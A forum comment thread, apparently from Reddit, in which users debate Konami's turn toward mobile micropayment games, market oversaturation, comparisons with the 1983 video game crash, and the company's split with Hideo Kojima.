These guys just have to develop a shitty game and rehash it 100 times over. This time it's "Shadow of China Dynasty Online", a card collection, micropayment based game. 6 months later, once the population of Shadow of Chine Dynasty Online dies down ... out comes "Space Dynasty Legion Online". A -you guessed it- card collection, micropayment based game. With large reused assets that were just given some mild Photoshop work to better fit the new theme. Repeat ad infinitum.  It's a bummer but Konami's been targeting that audience for ages with Pachinko and other gambling machines. Now that addictive pay-to-whatever mobile games are catching on Konami is just doing what they already do, but on a mobile platform. Why couldn't they just open a new division to do this with though? If they're attached to the name even if they call it "Konami mobile"? Why did they need to ruin their brand, show their loyal fans they don't give a shit about them and then also salt the earth for any further colab with the mastermind that is Hideo Kojima? "Mobile is where the future of proft lies."

That would have made more sense. That is completely true. Mobile games are cheap to make, easy to publish, easy to monetize, and easy to publish for different platforms.

Saying 'the future of gaming' just makes him sound like an idiot. Mobile games aren't making any innovations in the gaming industry, they have yet to match the quality of a AAA title or even a well made indie game, and no mobile game has ever made a 'gamer' say "Well this is obviously the future, I'll just go ahead and sell my PC, PS4, Wii U, and Xbox One." to be fair, he's talking to shareholders and not gamers. when he says the future he means sales and profit and is trying to justify their decision to bet primarily on mobile gaming. Wall Street (or whatever metonym the Nikkei has) might not understand the nuances of gaming, but they get sales, profitability, and franchises. he is probably seeking to assuage some doubt over the future of MGV5 and Pro Ev. We'll see about that.  
Konami is a big company. How many cheap mobile games are they gonna be able to push out? How many are others pushing out?  
Oversaturation might happen. Oversaturation has already been the case for years.  I just wonder when the mobile crash a-la 1983 is coming, because that was all about Atari allowing its developers to completely oversaturate the market with crap titles (the shovelware of its day).

Personally I hope it happens, because the 1983 crash led directly to the creation of the NES and a new gaming golden age. It won't happen that way, the market is too aware of it. Gaming is in a different place. Back in '83, there was only one gaming vertical - consoles. People didn't know gaming as a culture or industry like they do today. If mobile gaming collapses, an NES won't come, because the PC and console verticals are doing strong on their own. Mobile would collapse, and there would be a massive talent and energy shift in the industry, but it wouldn't be the Big Bang like the NES was. That's not true. PCs were a second vertical, and they were mostly unaffected by the crash. In fact, one of the reasons the crash happened was because computers were aiming directly at the console market. A Commodore 64 could do everything contemporary consoles could and more (except load a game within 1 minute), and was around the same price. I disagree, there was PC gaming back then as well, on Apple ][ systems, Commodore 64s, and IBM clones.  Not to mention arcades were HUGE. We also have resources today that help us find good and bad games (the internet, obviously). And games were more expensive then and buying a shitty one because it was based on a cute family movie about an alien had more of an impact then buying a $1 game does on your smart phone. &gt; It won't happen that way, the market is too aware of it.

"This bubble will never pop!" -*Every investor moments before their chosen "industry" bursts.* Even if there's a comparable crash, I don't think we'll ever see a repeat of that by any means.  The NES had a truly unique place in history, and succeeded in the manner it did because it was a closed system and Nintendo could enforce certain standards. (Love them or hate them for it, it worked.)

Nowadays, people generally no longer see a need for that kind of closed environment and demand open environments instead.  And as long as they have convergence devices for making phone calls and using the Internet anyways, they don't even have to make the otherwise expensive decision to own a gaming platform: they already have one.  And with the biggest expense already out of the way, it's quite easy to justify spending less than the price of a cup of trendy coffee on a pack of extra lives of a "booster" for the latest craze. [deleted] To what company are you referring? I'm not too familiar with the mobile scene. King and rovio or whoever made angry birds. Also zynga I think What? Rovio and King have not fallen into oblivion, not by a long shot. Zynga has certainly had their name dragged through the mud and are nowhere near where they were at their peak, but I feel like you just named a bunch of popular-to-hate mobile developers. King and Rovio are far from oblivion. Well, Konami has a lot of money. They can use that to push their apps as featured in the app stores, thereby overcoming the over saturation problem. That's how the bigger companies' games keep getting more and more popular in the app stores, while small games are difficult to find.  True, but they still have loads of capital they need to do something with, and there's only so many games mobile users are going to play.   Mobile game studios don't seem very sustainable. A lot of the big names are in trouble already. Zynga and Rovio etc. the future lies where the money is. it's always been that way. you can innovate as much as you want. if it doesnt sell it's worth shit.  There is next to no crossover between the mobile and 'traditional' gaming markets. There will continue to be money in both markets, mobile will never eclipse console/pc gaming because they serve very different purposes. Mobile is not where the future of all of gaming is, that notion is just dumb. Indeed, it is *a* future, not *the* future. It's a bit of a False Dilemma: Big mobile gaming and Big console/traditional gaming can coexist. It doesn't have to be strictly one or the other. It's just sad to see big players like Konami focus so much in mobile while they have such great potential in the console/PC gaming world. Agreed. They are different markets with a little crossover. Mobile has effectively stolen a large share of the more casual audience, but there will always be people who demand those deeper experiences. 

I think that independent development, crowd funding, and middleware like the Unity engine are going to play an important role in a future where more and more of the former big publishers follow Konami and Sega Sammy into other business directions. As long as mobile games remain just as profitable and just as easily developed, I think we will see more developers jump aboard the mobile gaming bandwagon like Konami has. While the two forms of entertainment *are* arguably different, it doesn't mean a damn thing if developers realize that -by developing mobile games instead- they can make just as much money (or more!) as a traditional video game with a quarter of the effort and development/upkeep cost. 

And these are games that they can milk for *years* with minimal, low-effort updates during those years. An average, traditional video game is essentially close-to-dead a year after its hit the shelves. It can be true, but the mobile market is riddled with problems and oversight issues. Just a couple of weeks ago, this sub was discussing 'Threes' and how they got banned for breaking the rules on the Google Market yet Google ignored that 2048 is a clone of Threes and failed to do anything about it.

For a quick buck, night job, cash and grab? Sure, mobile is your best platform. For long term sustainable mobile development? I just can't see it.

Imagine if Konami launches a mobile game, and someone just clones it (which happens ALL the time on the mobile market). How much would Konami have to spend to defend their IP? How much can they even contain? 

It is a market and a systems problem and it can't be solved by just one big dev or publisher.  &gt; Google ignored that 2048 is a clone of Threes and failed to do anything about it.

What? Why *should* they do anything about it? Meanwhile, Clash of Clans, Candy Crush, and The Simpsons: Tapped Out have been profitable for years, which is far longer than your average console title. There are problems, sure, but there is also a sustainable business to be made. "We've realized that mobile gamers will pay out the arse for really cheaply-made, simple games that cost us nearly nothing to produce.  As such, get ready for the sequels you've all been waiting for!  Like Contra:Mobile!  Each 30 shots be purchased by Gems!  Or just wait out the 4 hour reload timer."

"Because it worked so well for Dungeon Keeper!" If *Metal Slug Defense* is a thing, It could happen to Contra too :( I laughed and then cried. Here's hoping that doesn't become a reality. They already have with Contra Evolution.
But last time I checked it was delisted ftom Google Play. What an appropriate revelation from Konami. They've sullied their name in the gaming world, and burned a bridge with their shining star Kojima, so why not exodus to the cesspool that is mobile gaming?
They'll make their money and hopefully we'll see more from Kojima without them. I just hope they don't drag the MGS name through the mud. Guaranteed they're going to have a metal gear solid mobile. And that's just sad.

EDIT: OK I get it, there are mobile versions of metal gear solid. [deleted] [deleted] [deleted] [deleted] [deleted] [deleted] I think they were planning on a shift to mobile gaming and Kojima didn't like it. This is probably what caused a huge dispute between them. [deleted] I hope Konami has it completely wrong, I would hate their vision of the future of gaming to become the norm. 